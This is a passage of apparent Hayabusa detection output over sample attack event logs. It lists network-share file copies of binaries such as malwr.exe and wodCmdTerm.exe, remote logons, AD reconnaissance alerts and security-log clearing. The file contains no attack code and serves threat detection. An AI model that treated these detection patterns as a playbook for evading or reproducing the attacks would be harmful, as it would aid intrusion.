: Share Path: \??\C:\ : File: Users\user04\Searches\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.679 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Contacts : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.689 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.699 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Music : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:25.709 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user04\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: malwr.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Default\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share 
Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\AppData : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Fonts\desktop.ini : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\setup.bat : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: 
Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\ui\SwDRM.dll : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\Temp\wodCmdTerm.exe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55585 : LogonID: 
0x10fac2,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49244 : LogonID: 0x10fbcc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fbeb,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x10fc09,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49249 : LogonID: 0x110085,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx +2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:43.570 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55872 : LogonID: 0x15e162,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: user01 : Workstation: : IP Address: 10.0.2.17 : Port: 49222 : LogonID: 0x15e1a7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: user01 : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.0.2.17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ : Workstation: : IP Address: fe80::79bf:8ee2:433c:2567 : Port: 55873 : LogonID: 0x15e25f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,informational,Network Share Access,User: WIN-77LTAPHIQ1R$ : Share Name: \\*\SYSVOL : Share Path: \??\C:\Windows\SYSVOL\sysvol : IP Address: fe80::79bf:8ee2:433c:2567,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance 
Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: Administrator : Workstation WIN-77LTAPHIQ1R : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx +2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.179 
+09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: NULL : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e29a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,informational,NTLM Logon to Local Account,User: administrator : Workstation : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,informational,Admin Logon,User: Administrator : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,informational,Logon Type 3 - Network,User: Administrator : Workstation: : IP Address: 10.0.2.17 : Port: 49236 : LogonID: 0x17e2aa,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 